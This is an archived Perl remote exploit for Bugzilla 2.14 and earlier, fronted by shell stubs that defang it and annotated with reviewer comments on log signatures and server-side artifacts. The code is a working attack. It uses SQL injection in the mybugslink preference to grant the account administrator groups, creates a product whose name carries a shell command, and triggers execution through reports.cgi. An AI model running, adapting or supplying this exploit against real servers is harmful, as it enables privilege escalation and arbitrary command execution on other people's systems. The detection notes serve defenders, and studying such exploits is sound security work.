#!/bin/sh
# Defang stub (presumably prepended by the hosting archive): it prints a
# marker and exits, so when this file is run by sh nothing after the first
# `exit` is executed, including the Perl script further down.
echo DEFANGED.134391
exit
#!/bin/sh
# Second stub; unreachable after the `exit` above.
echo DEFANGED.135798
exit
#!/bin/sh
# Third stub; likewise unreachable.
echo DEFANGED.134392
exit
#!/usr/bin/perl

# Bugzilla <= 2.14 remote exploit - funkysh@sm.pl
# first unpublished release - 13/01/2001
# checked with version 2.12 - 08/05/2001
# checked with version 2.14 - 10/09/2001

# create_cmd(STRING) - build the percent-encoded value that the script later
# sends as the "product" query parameter.
#
# Steps, in order:
#   1. prefix the argument with ";" and append "|";
#   2. replace every "/" with a backtick `echo -e "\057"` substitution, so
#      the string carries no literal slash;
#   3. die if the result is longer than 64 characters;
#   4. percent-encode every printable ASCII character (space through "~").
#
# Returns the encoded string. It assigns the package global $cmd (there is
# no `my`), so the caller's $cmd is overwritten as a side effect.
#
# NOTE(review): ";", "|" and backticks are shell metacharacters, which
# suggests the affected server code handed the product name to a shell or a
# two-argument open() without escaping - confirm against the vendor advisory.
# NOTE(review): the 64-character cap presumably mirrors a server-side limit
# on product names - confirm.
# Detection: because step 4 encodes every printable character, the resulting
# `product=` value consists only of %xx escapes, beginning with %3b and
# ending with %7c. That pattern is easy to match in access logs.
sub create_cmd {
                 $cmd = ";" . $_[0];
                 # Swap each "/" for a backtick expression that emits octal 057 ("/").
                 $cmd =~ s/\//`echo -e "\\057"`/gs;
                 $cmd = $cmd . "|";
                 # Length is checked after the slash rewrite and before encoding.
                 if (length($cmd) > 64)
                   {
                     die ("created cmd string is longer than 64 chars, sorry.\n");
                   }
                 # %x prints lowercase hex; every character in [ -~] is >= 0x20,
                 # so each escape has two digits.
                 $cmd =~ s/([ -~])/sprintf ("%%%x", ord($1))/ge;
                 return $cmd
               }

# check_perm() - fetch the account's permissions page and report whether the
# "edit components" permission is listed.
#
# Takes no arguments. It reads the package globals $host, $login and
# $password and requests userprefs.cgi?...&bank=permissions through a
# `lynx -source` pipe. Each response line containing "<LI>Can" is printed
# with "<LI>" rewritten to "* "; if such a line also mentions
# "edit components", the global $perm is set to 1. Returns $perm.
#
# Caveats visible in the code:
#   - open() is unchecked and RES is not closed here, so a missing lynx
#     binary or a failed fetch is indistinguishable from "no permission";
#   - $perm is only ever set to 1, never reset, so a positive result from an
#     earlier call persists;
#   - the password is sent in the query string, so it is recorded in
#     web-server and proxy access logs along the path to $host;
#   - $host, $login and $password are interpolated into a local shell command
#     line protected only by double quotes.
sub check_perm {
                 open (RES, "lynx -source \"$host/userprefs.cgi?Bugzilla_login=$login&Bugzilla_password=$password&bank=permissions\"|");
                 while ($output = <RES>)
                      {
                        chomp($output);
                        # Permission entries are the list items that start with "Can".
                        if ($output =~ /<LI>Can/)
                          {
                            if ($output =~ /edit components/)
                              {
                                $perm = 1;
                              }
                            # Turn the HTML list marker into a plain-text bullet.
                            $output =~ s/\<LI>/\* /gs;
                            print (" $output\n");
                          }
                       }
                 return $perm;
               }

# Main flow. All state is held in package globals shared with check_perm()
# and create_cmd(); the file has no `use strict` / `use warnings`.
#
# Requests issued, in order - these are the access-log signatures a defender
# would look for:
#   1. userprefs.cgi   bank=permissions               (permission probe)
#   2. userprefs.cgi   bank=footer&dosave=1, with "groupset=" embedded in the
#                      mybugslink value               (only if the probe fails)
#   3. editproducts.cgi action=new, product=<fully percent-encoded string>
#   4. reports.cgi     output=show_chart, same product value, no credentials
# NOTE(review): a successful run presumably leaves two server-side
# artifacts - the account's groupset raised to the value below, and a
# product whose name starts with ";" and ends with "|" - confirm against an
# affected install before relying on them for incident response.
$perm = 0;
$done = 0;
# 9223372036854775807 is 2^63 - 1: every bit below the sign bit of a signed
# 64-bit integer is set. Presumably that selects every group bit - confirm.
$superusergroupset = "9223372036854775807";

# Four positional arguments are required: base URL, account, password, command.
if (@ARGV < 4)
  {
    die ("usage: $0 <url> <your_bugzilla_account> <passwd> <cmd>\n",
         " e.g.: $0 http://victim.com/bugzilla me\@email.com secret \"touch /tmp/heh\"\n");
  }

($host, $login, $password, $cmd) = (@ARGV);

print ("=> checking permissions\n");

# Step 1/2: probe, and if "edit components" is absent send the groupset request.
# The mybugslink value `1%27%20%2cgroupset=%27...` decodes to
# `1' ,groupset='<value>`: a quote that ends the intended value, followed by
# a second column assignment.
# NOTE(review): this implies the affected userprefs.cgi placed mybugslink
# into an UPDATE statement without quoting. The server-side fix is to
# quote/bind the value and to run a release newer than the 2.14 named in
# the header - confirm against the vendor advisory.
# The response to this request is not read here.
 if (! check_perm())
   {
     print ("=> unsufficient groupset, trying to become bugzilla administrator\n");
     open (RES, "lynx -source \"$host/userprefs.cgi?Bugzilla_login=$login&Bugzilla_password=$password&bank=footer&dosave=1&mybugslink=1%27%20%2cgroupset=%27$superusergroupset\"|");
   }

# Probe again; give up if the permission still is not listed.
 if (! $perm)
   {
     if (! check_perm())
      {
        die ("=> changing groupset failed\n");
      }
   }

print ("=> permissions ok, creating cmd-product ");

# Replace the raw command with its framed, percent-encoded form.
$cmd = (create_cmd($cmd));

# Step 3: create a product whose name is the encoded string.
open (RES, "lynx -source \"$host/editproducts.cgi?Bugzilla_login=$login&Bugzilla_password=$password&version=unspecified&product=$cmd&action=new\"|");

# Success is judged solely by the text "OK, done" appearing in the response
# (the dots in the pattern are unescaped, so each matches any character).
while ($output = <RES>)
     {
      chomp($output);
      if ($output =~ /OK, done./)
        {
          print ("[ok]\n"); $done = 1;
        }
     }

if (! $done)
  {
    die ("[failed]\n");
  }

# Step 4: request a chart for that product. No login parameters are sent
# with this request and the response is not read, so the script exits 0
# whether or not the request had any effect.
print ("=> trying to execute cmd on remote host\n");
open (RES, "lynx -source \"$host/reports.cgi?output=show_chart&product=$cmd&datasets=1\"|");
exit(0);
